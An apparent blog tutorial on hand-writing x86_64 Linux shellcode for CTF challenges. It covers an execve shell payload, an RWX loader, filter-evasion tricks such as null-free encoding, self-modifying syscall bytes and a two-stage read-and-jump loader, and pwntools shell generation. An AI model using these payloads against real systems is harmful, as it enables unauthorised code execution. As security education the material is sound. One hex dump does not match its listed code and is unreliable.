I have faith of who ever reading this article is not a layman, you are probably familiar with CTFs, overflowed the buffer and smashed the stack once, and knowing what you are getting your self into. I assume you know what a CTF challenge is, x86 assembly basics, and using linux.
The term “shellcode” originates from the common objective of an exploit usually
to execute a command shell /bin/sh. the code is written in an assembly
language.
 1#execve("/bin/bash",{NULL},{NULL})
 2.text
 3.global _start
 4_start:
 5    mov rax, 0x68732f6e69622f
 6    push rax
 7    push rsp
 8    pop rdi
 9    xor eax, eax
10    push rax
11    mov al, 59
12    push rsp
13    pop rdx
14    push rsp
15    pop rsi
16    syscall
Looking at his code for a first time is intimidating, and scary. but once you learn how to read it, writing the shellcode would be the easiest part of the job.
How does it execute
shellcode is simply executable bytes, it is a machine instructions assembled to perform a small task once control is hijacked.
In today’s computers, there are two architectures, Von Neumann, which sees and stores code as data. And Harvard architectures that stores data and code separately.
almost all general purpose architectures (x86, ARM, MIPS, etc..) are Von Neumann. That would be the focus of this article.
Starting out, we will use a simple shellcode loader to test and execute our shellcode.
 1#include <stdio.h>
 2#include <sys/mman.h>
 3#include <unistd.h> // for read()
 4
 5int main(void) {
 6    // 1. Allocate an executable memory page.
 7    //    PROT_READ | PROT_WRITE | PROT_EXEC: The memory can be read, written to, and executed.
 8    //    MAP_PRIVATE | MAP_ANON: The mapping is private to this process and not backed by a file.
 9    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);
10
11    if (page == MAP_FAILED) {
12        perror("mmap failed");
13        return 1;
14    }
15
16    printf("[+] Memory allocated at: %p\n", page);
17
18    // 2. Read shellcode from standard input (stdin) into the allocated page.
19    printf("[+] Reading shellcode from stdin...\n");
20    ssize_t bytes_read = read(STDIN_FILENO, page, 4095);
21
22    if (bytes_read <= 0) {
23        perror("read failed or no input provided");
24        return 1;
25    }
26
27    printf("[+] Read %ld bytes. Executing now...\n", bytes_read);
28
29    // 3. Create a function pointer to the page and call it.
30    //    This transfers execution to the shellcode.
31    void (*shellcode_func)() = page;
32    shellcode_func();
33
34    // This line will likely not be reached if the shellcode exits.
35    return 0;
36}
Shellcode is just bytes. If you want to execute it, those bytes must live in memory marked as executable.
the mmap call is important, if we requested a memory without PROT_EXEC The
moment the program tried to execute the code at page, the CPU’s memory
management unit would see the “No-Execute” permission on that memory page and
trigger a protection fault, resulting in a SIGSEGV.
We are asking for a single page (0x1000 bytes) of memory that is
- Writable: we load shellcode bytes into it using read
- Executable: the CPU will happily jmpinto it without complaining.
1void *page = mmap(
2    NULL,                // Let the kernel choose the address
3    4096,                // One page = 4096 bytes (common page size)
4    PROT_READ | PROT_WRITE | PROT_EXEC, // Permissions: read, write, execute
5    MAP_PRIVATE | MAP_ANON, // Private mapping, not backed by a file
6    -1,                  // File descriptor (-1 since it's anonymous)
7    0                    // Offset (not used here)
8);
The code is not compiled using the default gcc configuration, by default,
modern compilers have protection against shellcode, you need to disable when
compiling the program.
gcc -ggdb -g3 execute.c -fno-stack-protector -z execstack -no-pie -fno-pie -o execute
Using checksec, we see the Stack: Executable. That means that the data on the
stack could be treated as code.
$ pwn checksec --file=execute
[*] '/tmp/test/execute'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
Writing Shellcode
Before i start to write shellcode, i open loads documentation, syscall tables, and the manual for whatever assembly architecture i am writing. To mention a few, I use the Systrack: Linux kernel syscall tables for system calls lookups. And felix cloutier’s x86 and amd64 instruction reference, It’s easier to navigate, but the offical intel manual also works.
When writing shellcode, your goal is to execute Syscalls. Syscalls = system calls. They’re the special functions your program uses to talk to the kernel.
- readto ask kernel to read from a file.
- writeto ask kernel to write to a file.
- execveto ask the kernel to run another program.
- exitto tell kernel you’re done and exit cleanly.
Syscalls are functions, like any other functions, the take parameters. It is not
as easy as function(arg1, arg2, arg3), but you learn to do it.
Call convention for x86 and x86_64 architechtures:
| ARCH | RETURN | ARG0 | ARG1 | ARG2 | ARG3 | ARG4 | ARG5 | 
|---|---|---|---|---|---|---|---|
| x86 | eax | ebx | ecx | edx | esi | edi | ebp | 
| x64 | rax | rdi | rsi | rdx | r10 | r8 | r9 | 
To execute shellcode, You lookup the syscall number you want, the simplist
example is exit() syscall, looking it up in a man page you find this
definition
exit - cause normal process termination
#include <stdlib.h>
[[noreturn]] void exit(int status);
It takes only one parameter, exit status. On unix-like systems, a successful
exit is exit(0), so lets write that in shellcode. Never mind the first 3
lines, they are important for the compiler not for us for this case.
1.intel_syntax noprefix
2
3.global _start
4
5_start:
6    mov rax, 60      # syscall for exit
7    syscall          # execute the shellcode
Compile the shellcode using the following.
gcc -nostdlib -static hello.S -o hello.elf
This will create an elf file, inspect it and see the disassembly code.
objdump.
$ objdump -d -Mintel hello.elf
hello.elf:     file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <_start>:
  401000:   48 c7 c0 3c 00 00 00   mov    rax,0x3c
  401007:   0f 05                  syscall
We only want the .text section of the elf file. to extract it use objdump
objcopy --dump-section .text=hello.bin hello.elf
Use xxd to get compiled code
1$ xxd hello.bin
200000000: 48c7 c078 0000 00bb 0200 0000 4831 db6a  H..x........H1.j
300000010: 785f                                     x_
You can run the elf file just like any other linux program. it exits with
status 0, to check the status echo $?.
1./hello.elf
2echo $?
3# 0
For more logging use strace to see the syscalls get executed.
1strace ./hello.elf
2# execve("./hello.elf", ["./hello.elf"], 0x7ffe3fbd8560 /* 73 vars */) = 0
3# exit(0)                                 = ?
4# +++ exited with 0 +++
Now enough with long introduction, Lets get into the notes.
Problems you would run into when writing shellcode
Here are some of the common problems that you will run into eventually when you are writing shellcode.
Size constraints (Byte budget hell)
Your goal is to use the smallest number of bytes as possible.
XOR Instruction
Be careful of using mov too much. To zero out a register, do not use the
instruction mov. Use xor instead.
1mov    al,0x0       ; b0 00
2mov    ax,0x0       ; 66 b8 00 00
3mov    eax,0x0      ; b8 00 00 00 00
4mov    rax,0x0      ; 48 c7 c0 00 00 00 00
5
6xor    al,al        ; 30 c0
7xor    ax,ax        ; 66 31 c0
8xor    eax,eax      ; 31 c0
9xor    rax,rax      ; 48 31 c0
Push Pop
push something to the stack, and get it back by using pop
1;; 7 bytes
2mov rax, 0xbadc0de      ; 48 c7 c0 de c0 ad 0b
3
4;; 6 bytes
5push   0xbadc0de        ; 68 de c0 ad 0b
6pop    rax              ; 58
Use what you have
When you hijack the control flow of the code (e.g jmp rax) you may already
have some values stored at the registers. for example, when using the read
syscall, and rdx has a non-zero value. Use it as it is as the parameter
count. It is a sitiuation dependent but you get the point.
Strings
If you think strings are hard in C, well let me introduce you to x86_64.
I will use open syscall as an example.
1# open("/flag", O_RDONLY)
2mov rbx, 0x67616c662f           # push /flag filename
3push rbx
4mov rax, 2                      # open() syscall
5mov rdi, rsp                    # point to first item on stack ("/flag")
6mov rsi, 0                      # NULL the second arg (O_RDONLY)
7syscall                         # open("/flag", NULL)
This 0x67616c662f is /flag. it’s in little endian. to reproduce it you have
to run the following command.
1echo -ne "/flag" | rev | xxd -p
2# 67616c662f
The down side is you will struggle with long strings as it may not fit in the registers. One other way using labels, I prefer this way but it may not always work.
 1# open("/flag", O_RDONLY)
 2push 2
 3pop rax             # open syscall = 2
 4
 5lea rdi, [rip+flag]     # flag string
 6xor rsi, rsi        # O_RDONLY = 0
 7
 8syscall
 9
10flag:
11  .string "/flag"
There is also building the string on the stack. almost always work, but it requires lots of work.
 1# open("/flag", O_RDONLY)
 2# push "flag" little endian to stack
 3push 0x67616C66
 4pop  rax                        # rax = 0x0000000067616C66
 5
 6# shift left 8 bits to make room for the '/' byte
 7shl  rax, 8                     # rax = 0x00000067616C6600
 8# load '/' (0x2F) into rbx using push/pop
 9push 0x2F
10pop  rbx                        # rbx = 0x...0000002F
11
12# OR the '/' into the low byte
13or   rax, rbx                   # rax = 0x00000067616C662F
14# push the 64-bit qword (stack gets "/flag\0\0\0" in little-endian)
15push rax
16
17push 2                          # open syscall
18pop rax
19
20lea rdi, [rsp]                  # filename = "/flag"
21xor rsi, rsi                    # mode_t = O_RDONLY
22
23syscall
Input filtering
Input maybe manipulated, filtered of some bytes before execution.
String termination & \x00ull bytes
One great resource i found is nets.ec/Shellcode/Null-free which has many great examples.
- Use xor instruction instead of mov
This will use less bytes and not include null bytes.
1# bad
2mov rax, 0
3
4# good
5xor rax, rax
- Use push and pop instructions instead of mov
1push 0x70
2pop rax
3syscall
- Use shifting instructions
1mov     rdi, 0x68732f6e69622f6a   ; move the 64-bit immediate into RDI ('hs/nib/j' in little-endian)
2shr     rdi, 8                    ; logical right-shift RDI by 8 bits -> zero-terminates the low byte
3push    rdi                       ; push the 64-bit value (now contains "/bin/sh\0" when viewed as bytes)
4push    rsp                       ; push current RSP (stack pointer)
5pop     rdi                       ; pop that value into RDI -> RDI points at the pushed string
Self modifying shellcode
One time i was solving a ctf challenge, and it filters the syscall bytes
0F 05. I wrote a shellcode that constructs the syscall bytes 0F 05 at
runtime so it won’t be filtered. The following code increments the 0e by 1, so
it becomes 0F and this way it bypasses the filter.
1inc BYTE PTR [rip]
2.byte 0x0e, 0x05
NOP Padding
nop is an instruction that does nothing, sometimes you use it for padding,
aligning or whatever reason, it is useful.
 1.global _start
 2
 3_start:
 4    # Your code here
 5    nop
 6    nop
 7    #...
 8    nop
 9
10    .fill 10, 1, 0x90    # 10 NOP instructions
11    # or
12    .rept 10
13        nop
14    .endr
15
16    # More code here
Multi stage shellcode
Some times there will be input filtering that it is impossible to write shellcode to do anything meaningful. One way to solve this problem is a multi stage shellcode. Write a stage 1 shellcode “Loader” that its job is to load another shellcode. Only the stage 1 gets filtered.
 1push 0
 2push 0
 3pop rax         # read syscall
 4pop rdi         # stdin
 5
 6push rsp
 7pop rsi         # rsi = rsp (buffer)
 8
 9push 100
10pop rdx
11
12syscall
13
14jmp rsp
Use Pwntools when possible
it has lots of functions that automates and eases the process of writing shellcode. sometimes you don’t need to write shellcode at all, it does it for you. But first you have to understand how the magic works, if not you will waste a lot of time. RTFM.
Pwn shellcraft
1pwn shellcraft -l #List shellcodes
2pwn shellcraft -l amd #Shellcode with amd in the name
3pwn shellcraft -f hex amd64.linux.sh #Create in C and run
4pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
Pwn template
i like to use pwn template command to generate a starting point for my
challenges.
then use the asm("") function to write the shellcode instead of compiling and
passing it by hand through the shell.
1stage1 = asm("""# shellcode loader""")
2stage2 = asm("""# actual shellcode""")
3
4io.sendline(stage1)
5pause(1)
6io.sendline(stage2)
7
8io.interactive()
GDB Debugger
Using a debugger is essential. gdb is good but it lacks features, that is why i
recommend using pwndbg or gef with it. they help with visualisation and
provide functions that are useful for debugging.
1gdbscript = f'''
2
3# break points
4#...
5
6source /opt/gef/gef.py
7continue
8'''
References
- https://shell-storm.org/shellcode/index.html
- https://pwn.college/program-security/program-security/
- https://www.felixcloutier.com/x86/
- https://syscalls.mebeim.net/?table=x86/64/x64/latest
- https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86
- https://nets.ec/Shellcode/Null-free
- https://book.hacktricks.wiki/en/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html